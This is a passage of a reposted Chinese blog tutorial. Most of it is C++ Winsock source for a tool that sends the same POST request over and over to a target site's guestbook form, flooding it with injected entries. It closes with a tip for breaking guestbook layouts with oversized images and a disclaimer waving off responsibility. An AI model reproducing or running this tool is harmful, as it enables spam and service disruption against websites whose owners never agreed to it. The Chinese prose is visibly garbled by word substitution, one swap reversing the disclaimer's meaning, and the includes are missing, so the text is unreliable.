用Winsock实现对网站数据库的数据注入
return 1;
}
--------------------------------------------------------------------------------
/* booksend.cpp */
/* 报文发送程序 */
#include
#include
#include "encode.h"
#include
#pragma comment(lib,"ws2_32.lib")
int checkpra(int argc,char *argv[]);
void usage();
DWORD WINAPI senddata(LPVOID lp);
char ip[20]={0};
USHORT port=0;
char page[128]={0};
char value[1024]={0};
int ttime=1;
int delaytime=2000;
SOCKET sock;
struct sockaddr_in sin;
char sendbuf[1024*4]={0};
void main(int argc,char *argv[])
{
if(checkpra(argc,argv)==-1) return;
WSADATA wsa;
if(WSAStartup(0x0202,&wsa)!=0)
{
printf("WSAStartup failed with error:%d\n",GetLastError());
return;
}
sin.sin_family=AF_INET;
if(inet_addr(ip)!=INADDR_NONE)
sin.sin_addr.s_addr=inet_addr(ip);
else
{
struct hostent *phost=gethostbyname(ip);
if(phost==NULL)
{
printf("Resolve %s error!\n",ip);
return;
}
memcpy(&sin.sin_addr,phost->h_addr_list[0],phost->h_length);
}
sin.sin_port=htons(port);
char tempbuf[1024]={0};
sprintf(tempbuf,"POST %s HTTP/1.1\n",page);
strcpy(sendbuf,tempbuf);
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"HOST: %s\n",ip);
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Accept: image/gif, */*\n");
strcat(sendbuf,"Content-Type: application/x-www-form-urlencoded\n");
memset(tempbuf,0,sizeof(tempbuf));
sprintf(tempbuf,"Content-Length: %d\n",strlen(value));
strcat(sendbuf,tempbuf);
strcat(sendbuf,"Connection: Keep-Alive\n\n");
strcat(sendbuf,value);
for(int i=0;i {
CreateThread(NULL,0,senddata,&i,0,NULL);
Sleep(delaytime);
}
WSACleanup();
}
DWORD WINAPI senddata(LPVOID lp)
{
SOCKET sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==INVALID_SOCKET)
{
printf("Socket() failed with error:%d\n",GetLastError());
return -1;
}
int ret;
printf("State:Connecting...\n");
ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin));
if(ret==SOCKET_ERROR)
{
printf("Connect() failed with error:%d\n",GetLastError());
return -1;
}
printf("State:Connected!\n");
printf("State:Sending...time %d ",*(int*)lp+1);
ret=send(sock,sendbuf,strlen(sendbuf)+1,0);
if(ret>0)
printf("Send success!\n");
else
printf("Send error!\n");
char recvbuf[1024*10]={0};
ret=recv(sock,recvbuf,sizeof(recvbuf),0);
if(strstr(recvbuf,"100")||strstr(recvbuf,"200")||strstr(recvbuf,"302"))
printf("呵呵,注入乐成啦!\n\n");
else
printf("注入有点问题哦,请查实一下!\n\n");
closesocket(sock);
return 1;
}
void usage()
{
char pathname[128]={0};
GetModuleFileName(NULL,pathname,sizeof(pathname));
char *p=pathname+strlen(pathname)-1;
for(;*p!='\\';p--);
printf("-------------------------------------------------------------------------------\n");
printf("Usage:%s ip port page value [times] [delay]\n",p+1);
printf("Code by JsuFcz--http://jsufcz.21xcn.net\n");
printf("Ex:%s 10.0.0.169 80 /guestbk/add.php name=abc-body=hehe-doadd=发送留言",p+1);
printf("-------------------------------------------------------------------------------\n");
}
int checkpra(int argc,char *argv[])
{
if(argc<5)
{
printf("错误的用法:至少应使用4个参数\n\n");
usage();
return -1;
}
else if(argc>6)
{
printf("错误的用法:最多只要6个参数\n\n");
usage();
return -1;
}
if(argc==6)
{
ttime=atoi(argv[5]);
}
if(argc==7)
{
ttime=atoi(argv[5]);
delaytime=atoi(argv[6]);
}
strcpy(ip,argv[1]);
port=atoi(argv[2]);
strcpy(page,argv[3]);
for(int i=0;argv[4][i]!=0;i++)
{
if(argv[4][i]=='-') argv[4][i]='&';
if(argv[4][i]=='\'') argv[4][i]=' ';
}
encode(argv[4],value);
return 0;
}
以上代码已在VC6上编译经过,你也可以到自己小我私家主页上(http://jsufcz.21xcn.net)下载到源代码和下令行程序。
在文章的末了,偶另有一点心得要与各人分享。在留言本中要是有提交表情或是图片之类的,由于本本的相对链接的限制,只要是本本目录下的图片资源,偶们就可以随便拿来贴,这样要是某个图片的尽寸很大的话,本本的版面就被你弄坏了。
(申明:本文章是偶拿来供感兴趣的技术业朋侪分享的,如有人用于合法企图,偶可不管咯)
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
上一篇: 进入系统后如何隐藏自己?
